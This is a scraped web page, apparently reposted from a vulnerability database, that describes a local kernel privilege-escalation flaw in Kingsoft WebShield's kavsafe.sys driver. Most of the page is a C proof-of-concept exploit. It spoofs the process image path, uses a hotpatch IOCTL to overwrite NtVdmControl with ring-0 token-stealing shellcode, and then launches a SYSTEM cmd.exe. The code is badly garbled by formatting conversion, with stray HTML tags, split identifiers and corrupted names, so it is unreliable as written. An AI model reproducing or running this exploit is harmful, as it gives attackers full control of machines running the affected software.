Kingsoft Network Security Local Elevation of Privilege Vulnerability

Source: Internet
Author: User
Kingsoft WebShield kavsafe. sys <=
2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation
Vulnerabilityssv ID: WebShield kavsafe. sys <= 2010.4.14.609 (2010.5.23) Kernel Mode local
Privilege Escalation Vulnerability "href =" "target =" _ blank "> 19676sebug-appdir: Kingsoft Release Date: 2010-05-23 information submitted: yicong2010


Affected Versions:
Kingsoft WebShield <= (2010.5.23)

Signature Date: 2010-5-23 2:33:54


KAVSafe.sys <= 2010.4.14.609
Signature Date:2010-4-14 13:42:26
Vulnerability description:
Kavsafe.sys create a device called DeviceKAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data
<* Reference


*> Test method:


The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!


# Define ctl_code (0x8300, 0x835, method_buffered, file_any_access) <br/> typedef long (winapi * pnt_query_information_process) (<br/> handle processhandle, <br/> DWORD processinformationclass, <br/> pvoid processinformation, <br/> ulong processinformationlength, <br/> Pulong returnlength <br/> ); <br/> typedef struct _ string {<br/> ushort length; <br/> ushort maximumleng Th; <br/> pchar buffer; <br/>}string; <br/> typedef string * pstring; <br/> typedef struct _ rtl_drive_letter_curdir {<br/> ushort flags; <br/> ushort length; <br/> ulong timestamp; <br/> string dospath; <br/>} rtl_drive_letter_curdir, * delimiter; <br/> typedef struct _ unicode_string {<br/> ushort length; <br/> ushort maximumlength; <br/> pwstr buffer; <br/>} unicode_string; <br/> type Def unicode_string * punicode_string; <br/> typedef const unicode_string * pcunicode_string; <br/> # define rtl_max_drive_letters 32 <br/> # define rtl_drive_letter_valid) 0x0001 <br/> typedef struct _ curdir {<br/> unicode_string dospath; <br/> handle; <br/>}curdir, * pcurdir; <br/> typedef struct _ rtl_user_process_parameters {<br/> ulong maximumlength; <br/> ulong length; </P> <p> ulong flag S; <br/> ulong debugflags; </P> <p> handle consolehandle; <br/> ulong consoleflags; <br/> handle standardinput; <br/> handle standardoutput; <br/> handle standarderror; </P> <p> curdir currentdirectory; // processparameters <br/> unicode_string dllpath; // processparameters <br/> unicode_string imagepathname; // processparameters <br/> unicode_string CommandLine; // processparameters <br/> pvoid envir Onment; // ntallocatevirtualmemory </P> <p> ulong startingx; <br/> ulong startingy; <br/> ulong countx; <br/> ulong county; <br/> ulong countcharsx; <br/> ulong countcharsy; <br/> ulong fillattriags; </P> <p> ulong windowflags; <br/> ulong showwindowflags; <br/> unicode_string windowtitle; // processparameters <br/> unicode_string returns topinfo; // processparameters <br/> unicode_string shellinfo; // P Rocessparameters <br/> unicode_string runtimedata; // processparameters <br/> using currentdirectores [rtl_max_drive_letters]; <br/>} rtl_user_process_parameters, * parameters; <br/> typedef struct _ peb {<br/> Boolean inheritedaddressspace; // these four fields cannot change unless the <br/> Boolean readimagefileexecoptions; // <br/> Boolean beingdebugged; // <br /> Boolean sparebool; // <br/> handle mutant; // initial_peb structure is also updated. </P> <p> pvoid imagebaseaddress; <br/> pvoid LDR; <br/> struct _ rtl_user_process_parameters * processparameters; <br/>} peb, * ppeb; <br/> typedef long kpriority; <br/> typedef struct _ process_basic_information {<br/> long exitstatus; <br/> pvoid pebbaseaddress; <br/> ulong_ptr affinitymask; <br/> kpriority basepri Ority; <br/> ulong_ptr uniqueprocessid; <br/> ulong_ptr identifier; <br/>} process_basic_information, * pprocess_basic_information; <br/> typedef struct {<br/> ulong unknown1; <br/> ulong unknown2; <br/> pvoid base; <br/> ulong size; <br/> ulong flags; <br/> ushort index; <br/> ushort namelength; <br/> ushort loadcount; <br/> ushort pathlength; <br/> char imagename [1, 256]; <br/>} sys Struct, * struct; <br/> typedef struct {<br/> ulong count; <br/> system_module_information_entry module [1]; <br/>} x_system_module_information, * px_system_module_information; <br/> typedef long (winapi * pnt_query_system_information) (<br/> long systeminformationclass, <br/> pvoid systeminformation, <br/> ulong systeminformationlength, <br/> Pulong RET Urnlength <br/>); <br/> # define ntcurrentprocess () (handle) (long_ptr)-1) <br/> typedef long (winapi * pnt_vdm_control) (<br/> ulong service, <br/> pvoid servicedata <br/>); <br/> void _ declspec (naked) r0shellcodexp () <br/>{< br/>__ ASM <br/>{< br/> mov eax, 0xffdff124 <br/> mov eax, [eax] <br/> mov ESI, dword ptr [eax + 0x220] <br/> mov eax, ESI <br/> searchxp: <br/> mov eax, dword ptr [eax + 0x88] <br/> sub EA X, 0x88 <br/> mov edX, dword ptr [eax + 0x84] <br/> CMP edX, 4 <br/> jnz searchxp <br/> mov eax, dword ptr [eax + 0xc8] <br/> mov dword ptr [ESI + 0xc8], eax <br/> RET 8 <br/>}< br/> void nopnop () <br/>{< br/> printf ("Nop! /N "); <br/>}< br/> # include" malloc. H "<br/> int main (INT argc, char * argv []) <br/>{< br/> printf (" kswebshield kavsafe. sys <= 2010,04, 14,609/N "<br/>" kernel mode Privilege Escalation Vulnerability proof-of-concept/N "<br/>" 2010-5-23/N "<br/>" by lincoin/n/npress enter "); <br/> hkey; <br/> wchar installpath [max_path]; <br/> DWORD datatype; <br/> DWORD datasize = max_path * sizeof (wchar ); <br/> ulong Oldlen; <br/> pvoid poldbufferdata = NULL; <br/> If (regopenkey (HKEY_LOCAL_MACHINE, "software // Kingsoft // kswsvc", & hkey) = error_success) <br/>{< br/> If (regqueryvalueexw (hkey, l "programpath", null, & datatype, (lpbyte) installpath, & datasize )! = Error_success) <br/>{< br/> regclosekey (hkey); <br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> regclosekey (hkey ); <br/>}< br/> else <br/> {<br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> wcscat (installpath, l "// kavinst.exe"); </P> <p> process_basic_information PBI; <br/> pnt_query_information_process pntqueryinformationpr Ocess; </P> <p> pntqueryinformationprocess = (pnt_query_information_process) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntqueryinformationprocess "); </P> <p> pntqueryinformationprocess (ntcurrentprocess (), 0, & PBI, sizeof (PBI), null ); <br/> ppeb peb; <br/> peb = (ppeb) PBI. pebbaseaddress; <br/> oldlen = peb-> processparameters-> imagepathname. length; <br/> peb-> processparameters-> imagepathname. length = Wcslen (installpath) * sizeof (wchar); <br/> poldbufferdata = malloc (peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (poldbufferdata, peb-> processparameters-> imagepathname. buffer, peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (peb-> processparameters-> imagepathname. buffer, installpath, peb-> processparameters-> imagepathname. length); <br/> handle hdev = createfile ("////. // Kavsafe ", <br/> file_read_attributes, <br/> file_share_read, <br/> 0, <br/> open_existing, <br/> 0, <br/> 0); <br/> If (hdev = invalid_handle_value) <br/>{< br/> printf ("cannot open device % u/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> rtlcopymemory (peb-> processparameters-> imagepathname. buffer, poldbufferdata, peb-> processparameters-> imagepathname. length); <br/> peb-> Process Parameters-> imagepathname. length = (ushort) oldlen; </P> <p> pnt_query_system_information pntquerysysteminformation; <br/> pntquerysysteminformation = (pnt_query_system_information) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntquerysysteminformation "); <br/> x_system_module_information sysmod; <br/> hmodule kernelhandle; <br/> pntquerysysteminformation (0xb, & sysmod, sizeof (sysmod ), null); </P> <p> K Ernelhandle = loadlibrary (strrchr (sysmod. module [0]. imagename, '//') + 1); </P> <p> If (kernelhandle = 0) <br/>{< br/> printf ("cannot load ntoskrnl! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pvoid pntvdmcontrol = getprocaddress (kernelhandle, "ntvdmcontrol"); <br/> If (pntvdmcontrol = 0) <br/> {<br/> printf ("cannot find ntvdmcontrol! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pntvdmcontrol = (pvoid) (ulong) pntvdmcontrol-(ulong) kernelhandle); <br/> printf ("ntvdmcontrol = % 08x", pntvdmcontrol); </P> <p> getchar (); <br/> ulong shellcodesize = (ulong) nopnop-(ulong) r0shellcodexp; <br/> ulong pshellcode = (ulong) r0shellcodexp; </P> <p> pvoid DATA = malloc (0x48 + shellcodesize); <br/> copymemory (pvoid) (ulong) Data + 0x48), r0sh Ellcodexp, shellcodesize); </P> <p> char modulename [68] = "ntoskrnl.exe"; <br/> rtlcopymemory (data, modulename, sizeof (modulename )); <br/> * (ulong *) (ulong) Data + 64) = (ulong) pntvdmcontrol; <br/> * (ulong *) (ulong) Data + 68) = shellcodesize; </P> <p> ulong BTR; <br/> If (! Deviceiocontrol (hdev, <br/> ioctl_hotpatch_kernel_module, <br/> data, <br/> 0x48 + shellcodesize, <br/> null, <br/> 0, <br/> & BTR, 0 <br/>) <br/> {<br/> printf ("cannot device Io control! % U/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> closehandle (hdev ); <br/> pnt_vdm_control pr3ntvdmcontrol = (pnt_vdm_control) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntvdmcontrol "); <br/> pr3ntvdmcontrol (0, 0); </P> <p> winexec (" cmd.exe ", sw_show ); <br/> printf ("OK! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/>



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.